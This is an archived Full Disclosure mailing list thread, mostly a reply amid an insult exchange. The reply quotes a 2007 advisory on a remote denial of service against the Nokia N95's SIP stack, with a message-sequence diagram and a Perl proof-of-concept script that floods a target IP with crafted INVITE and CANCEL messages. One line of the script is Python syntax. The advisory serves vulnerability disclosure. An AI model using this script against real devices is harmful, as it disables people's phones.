Full Disclosure mailing list archives
Re: Nokia N95 cellphone remote DoS using the SIP Stack
From: state () loria fr
Date: Wed, 5 Dec 2007 20:57:13 +0100
hi Reepex, I do not understand why are frustrated about a computer science degree. Maybe, someone got dropped out of a degree programm and some psychological trauma gets activated when seeing a Ph.D? If you like it or not, in order to get a computer science degree, you will have to take classes, and most classes are taught by Ph.Ds. I will not argue with you on why I use the Ph.D in my signature, but if you really want to know, look at our research papers published in academic journals/conferences. (If you do not find them, I can send them to you). If you will ever understand the contents, then you will understand what are our credentials..:) This will probably never happen. At least, I use a signature and a real name and do not hide behind a gmail account. Meanwhile try yourself to find at least one vulnerability and enjoy Perl programming, it seemes your computer science skills are somehow in this area :) Greetings RS Selon reepex <reepex () gmail com>:
So almighty Phd what is your thesis exactly? To me it seems to be 'how to run a fuzzer then write crappy perl scripts to exploit DoS conditions' does this properly summarize your phd credentials? I guess you could tack on 'after writing the crappy scripts, flood mailing lists with our crap, and get made fun of' I am sure you will serve the academic community great one day when teach "hacking" classes revolving around the latest editions of hacking exposed On Dec 5, 2007 11:05 AM, Radu State <State () loria fr> wrote:Nokia N95 cellphone remote DoS using the SIP Stack Severity: High Denial of Service Hardware: Nokia N95 Firmware: Tested version: Nokia RM-159 V 12.0.013 Notification: Vulnerability found: 11 September 2007 Contact Nokia Support: 12 September 2007 / None reply Contact Nokia Security Support: 19 September 2007 / None reply Vulnerability Synopsis: If the device has the SIP Phone client activated, a sequence of SIP messages turn the device in an inconsistent state where the user is notableto operate it anymore until it reboots. The sequence of messages consists in 2 different SIP Dialogs where the first initiates an INVITE transaction but immediately closes it (in an anticipated manner). While, the second transaction initiates a normalINVITEtransaction that trigger the vulnerability of the target. The sequence of messages is illustrated below. X ------------------------- INVITE -----------------------> Nokiav12 X <---------------------- 100 Trying ---------------------- Nokiav12 X ------------------------- CANCEL -----------------------> Nokiav12 X <----------------- OK (to the Cancel) ------------------- Nokiav12 X <---------------- 487 Request Terminated ---------------- Nokiav12 --------New Dialog-------- X ------------------------- INVITE -----------------------> Nokiav12 X <---------------------- 100 Trying ---------------------- Nokiav12 X <---------------------- 180 Trying ---------------------- Nokiav12 ---- The device does not work properly anymore ---- Impact: A remote entity can take down all the services of the cell phone Resolution: As we did not get any proper reply from Nokia about the subject, the best way will be to disable the SIP Client Credits: Humberto J. Abdelnur (Ph.D Student) Radu State (Ph.D) Olivier Festor (Ph.D) This vulnerability was identified by the Madynes research team at INRIA Lorraine, using KiF the Madynes VoIP fuzzer. http://madynes.loria.fr/ Proof of Concept: A perl script (nokiav12.pl) is attached to this mail. Before launching it, the SIP phone has to be initialed in the target device Command: perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername> Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu #!/usr/bin/perl ################################################## # Vulnerabily discovered using KiF ~ Kiph # # # # Authors: # # Humberto J. Abdelnur (Ph.D Student) # # Radu State (Ph.D) # # Olivier Festor (Ph.D) # # # # Madynes Team, LORIA - INRIA Lorraine # # http://madynes.loria.fr # ################################################## use IO::Socket::INET; use String::Random; die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>" unless ($ARGV[3]); $targetUser = $ARGV[1]; $targetIP = $ARGV[0]; $attackerUser = $ARGV[3]; $attackerIP= $ARGV[2]; $socket=new IO::Socket::INET->new( Proto=>'udp', PeerPort=>5060, PeerAddr=>$targetIP, LocalPort=>5060); $foo = new String::Random; $callid= $foo->randpattern("CCccnCn"); $cseq = $foo->randregex('\d\d\d\d'); $sdp = "v=0\r o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r s=-\r c=IN IP4 $attackerIP\r t=0 0\r m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r a=sendrecv\r a=ptime:20\r a=maxptime:200\r a=fmtp:96 mode-change-neighbor=1\r a=fmtp:18 annexb=no\r a=fmtp:98 0-15\r a=rtpmap:96 AMR/8000/1\r a=rtpmap:0 PCMU/8000/1\r a=rtpmap:8 PCMA/8000/1\r a=rtpmap:97 iLBC/8000/1\r a=rtpmap:18 G729/8000/1\r a=rtpmap:98 telephone-event/8000/1\r a=rtpmap:13 CN/8000/1\r "; $sdplen= length $sdp; $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r From: <sip:$attackerUser\@$attackerIP>;tag=1\r To: <sip:$targetUser\@$targetIP>\r Call-ID: $callid\@$attackerIP\r CSeq: $cseq INVITE\r Max-Forwards: 70\r Contact: <sip:$attackerUser\@$attackerIP>\r Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r Content-Type: application/sdp\r Content-Length: $sdplen\r \r $sdp"; $socket->send($msg); $text = ''; while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){ $socket->recv($text,1024,0); } $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r From: <sip:$attackerUser\@$attackerIP>;tag=1\r To: <sip:$targetUser\@$targetIP>;tag=1\r Call-ID: $callid\@$attackerIP\r CSeq: $cseq CANCEL\r Max-Forwards: 70\r Content-Length: 0\r \r "; $socket->send($msg); time.sleep(1); $callid= $foo->randpattern("CCccnCn"); $cseq = $foo->randregex('\d\d\d\d'); $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r From: <sip:$attackerUser\@$attackerIP>;tag=2\r To: <sip:$targetUser\@$targetIP>\r Call-ID: $callid\@$attackerIP\r CSeq: $cseq INVITE\r Contact: <sip:$attackerUser\@$attackerIP>\r Max-Forwards: 70\r Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r Content-Type: application/sdp\r Content-Length: $sdplen\r \r $sdp"; $socket->send($msg); No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date: 04/12/2007 19:31 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Nokia N95 cellphone remote DoS using the SIP Stack Radu State (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack state (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack nnp (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack Humberto Abdelnur (Dec 06)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack state (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)
- Re: Nokia N95 cellphone remote DoS using the SIP Stack reepex (Dec 05)